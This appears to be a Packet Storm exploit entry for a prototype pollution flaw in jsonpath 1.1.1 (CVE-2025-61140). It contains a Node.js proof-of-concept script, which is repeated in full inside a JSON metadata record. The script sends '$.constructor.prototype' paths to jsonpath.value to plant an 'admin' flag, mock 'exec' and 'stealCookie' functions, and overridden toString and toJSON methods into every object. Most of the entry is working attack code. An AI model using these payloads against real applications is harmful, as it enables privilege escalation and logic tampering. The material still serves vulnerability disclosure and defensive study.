📄 jsonpath 1.1.1 Prototype Pollution_PACKETSTORM:215222

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

Proof of concept exploit for a prototype pollution vulnerability in jsonpath version 1.1.1, where unsafe writes to $.constructor.prototype allows attackers to inject arbitrary properties and functions into Object.prototype. By abusing jsonpath.value,...

Visit Original Source

Basic Information

ID PACKETSTORM:215222

Published Feb 10, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : jsonpath 1.1.1 Prototype Pollution via constructor.prototype Assignment |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://www.redhat.com/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/215071/ & CVE-2025-61140

[+] Summary : a prototype pollution vulnerability in jsonpath v1.1.1, where unsafe writes to $.constructor.prototype allow attackers to inject arbitrary properties and functions into Object.prototype.
By abusing jsonpath.value, an attacker can globally modify object behavior—adding flags (e.g., admin), overriding core methods (toString, toJSON), and impacting arrays and strings through
the shared prototype chain. The PoC runs in Node.js and shows how a vulnerable application that accepts user‑controlled JSONPath expressions can be compromised,
leading to privilege escalation and logic manipulation across the entire runtime.
Unvalidated writes to constructor.prototype enable global state corruption—making prototype pollution a high‑impact risk even without direct code execution.

[+] POC :

const jsonpath = require('jsonpath');

console.log("=== Prototype Pollution PoC By indoushka(jsonpath 1.1.1) ===\n");
console.log("1. Basic Test:");
console.log("Before:", ({}).polluted); // undefined
jsonpath.value({}, '$.constructor.prototype.polluted', "Yes, polluted");
jsonpath.value({}, '$.constructor.prototype.isHacked', true);
jsonpath.value({}, '$.constructor.prototype.hacker', "attacker");

console.log("After polluted:", ({}).polluted);
console.log("After isHacked:", ({}).isHacked);
console.log("After hacker:", ({}).hacker);
console.log("\n2. Function Injection:");

jsonpath.value({}, '$.constructor.prototype.exec', function (cmd) {
return `[MOCK EXEC] ${cmd}`;
});

jsonpath.value({}, '$.constructor.prototype.stealCookie', function () {
return "Node.js environment – no cookies";
});

const o = {};
console.log(o.exec("whoami"));
console.log(o.stealCookie());
console.log("\n3. Behavior Modification:");

const originalToString = Object.prototype.toString;
const originalToJSON = Object.prototype.toJSON;

jsonpath.value({}, '$.constructor.prototype.toString', function () {
return "[Object HACKED]";
});

jsonpath.value({}, '$.constructor.prototype.toJSON', function () {
return { hacked: true };
});

const test = { a: 1 };
console.log("toString:", test.toString());
console.log("JSON:", JSON.stringify(test));
console.log("\n4. Other Types:");
const arr = [1, 2, 3];
console.log("Array polluted:", arr.polluted);
const str = "hello";
console.log("String polluted:", str.polluted);
console.log("\n5. Practical Scenario:");

function vulnerableApplication(path, value) {
jsonpath.value({}, path, value);
}

console.log("Before admin:", ({}).admin);

vulnerableApplication(
'$.constructor.prototype.admin',
true
);

console.log("After admin:", ({}).admin);
console.log("\n6. Cleanup:");

delete Object.prototype.polluted;
delete Object.prototype.isHacked;
delete Object.prototype.hacker;
delete Object.prototype.exec;
delete Object.prototype.stealCookie;
delete Object.prototype.admin;

Object.prototype.toString = originalToString;
Object.prototype.toJSON = originalToJSON;

console.log("After cleanup polluted:", ({}).polluted);
console.log("After cleanup admin:", ({}).admin);

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-10T19:07:10",
    "description": "Proof of concept exploit for a prototype pollution vulnerability in jsonpath version 1.1.1, where unsafe writes to $.constructor.prototype allows attackers to inject arbitrary properties and functions into Object.prototype. By abusing jsonpath.value,...",
    "published": "2026-02-10T00:00:00",
    "modified": "2026-02-10T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 jsonpath 1.1.1 Prototype Pollution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215222",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-61140"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : jsonpath 1.1.1 Prototype Pollution via constructor.prototype Assignment                                                     |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://www.redhat.com/                                                                                                     |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/215071/  & \tCVE-2025-61140\n    \n    [+] Summary    : a prototype pollution vulnerability in jsonpath v1.1.1, where unsafe writes to $.constructor.prototype allow attackers to inject arbitrary properties and functions into Object.prototype. \n                     By abusing jsonpath.value, an attacker can globally modify object behavior\u2014adding flags (e.g., admin), overriding core methods (toString, toJSON), and impacting arrays and strings through \n    \t\t\t\t the shared prototype chain. The PoC runs in Node.js and shows how a vulnerable application that accepts user\u2011controlled JSONPath expressions can be compromised, \n    \t\t\t\t leading to privilege escalation and logic manipulation across the entire runtime.\n                     Unvalidated writes to constructor.prototype enable global state corruption\u2014making prototype pollution a high\u2011impact risk even without direct code execution.\n      \n    [+] POC :   \n    \n    const jsonpath = require('jsonpath');\n    \n    console.log(\"=== Prototype Pollution PoC By indoushka(jsonpath 1.1.1) ===\\n\");\n    console.log(\"1. Basic Test:\");\n    console.log(\"Before:\", ({}).polluted); // undefined\n    jsonpath.value({}, '$.constructor.prototype.polluted', \"Yes, polluted\");\n    jsonpath.value({}, '$.constructor.prototype.isHacked', true);\n    jsonpath.value({}, '$.constructor.prototype.hacker', \"attacker\");\n    \n    console.log(\"After polluted:\", ({}).polluted);\n    console.log(\"After isHacked:\", ({}).isHacked);\n    console.log(\"After hacker:\", ({}).hacker);\n    console.log(\"\\n2. Function Injection:\");\n    \n    jsonpath.value({}, '$.constructor.prototype.exec', function (cmd) {\n        return `[MOCK EXEC] ${cmd}`;\n    });\n    \n    jsonpath.value({}, '$.constructor.prototype.stealCookie', function () {\n        return \"Node.js environment \u2013 no cookies\";\n    });\n    \n    const o = {};\n    console.log(o.exec(\"whoami\"));\n    console.log(o.stealCookie());\n    console.log(\"\\n3. Behavior Modification:\");\n    \n    const originalToString = Object.prototype.toString;\n    const originalToJSON   = Object.prototype.toJSON;\n    \n    jsonpath.value({}, '$.constructor.prototype.toString', function () {\n        return \"[Object HACKED]\";\n    });\n    \n    jsonpath.value({}, '$.constructor.prototype.toJSON', function () {\n        return { hacked: true };\n    });\n    \n    const test = { a: 1 };\n    console.log(\"toString:\", test.toString());\n    console.log(\"JSON:\", JSON.stringify(test));\n    console.log(\"\\n4. Other Types:\");\n    const arr = [1, 2, 3];\n    console.log(\"Array polluted:\", arr.polluted);\n    const str = \"hello\";\n    console.log(\"String polluted:\", str.polluted);\n    console.log(\"\\n5. Practical Scenario:\");\n    \n    function vulnerableApplication(path, value) {\n        jsonpath.value({}, path, value);\n    }\n    \n    console.log(\"Before admin:\", ({}).admin);\n    \n    vulnerableApplication(\n        '$.constructor.prototype.admin',\n        true\n    );\n    \n    console.log(\"After admin:\", ({}).admin);\n    console.log(\"\\n6. Cleanup:\");\n    \n    delete Object.prototype.polluted;\n    delete Object.prototype.isHacked;\n    delete Object.prototype.hacker;\n    delete Object.prototype.exec;\n    delete Object.prototype.stealCookie;\n    delete Object.prototype.admin;\n    \n    Object.prototype.toString = originalToString;\n    Object.prototype.toJSON   = originalToJSON;\n    \n    console.log(\"After cleanup polluted:\", ({}).polluted);\n    console.log(\"After cleanup admin:\", ({}).admin);\n    \n    Greetings to :======================================================================\n    jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|\n    ====================================================================================",
    "sourceHref": "https://packetstorm.news/download/215222",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215222/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply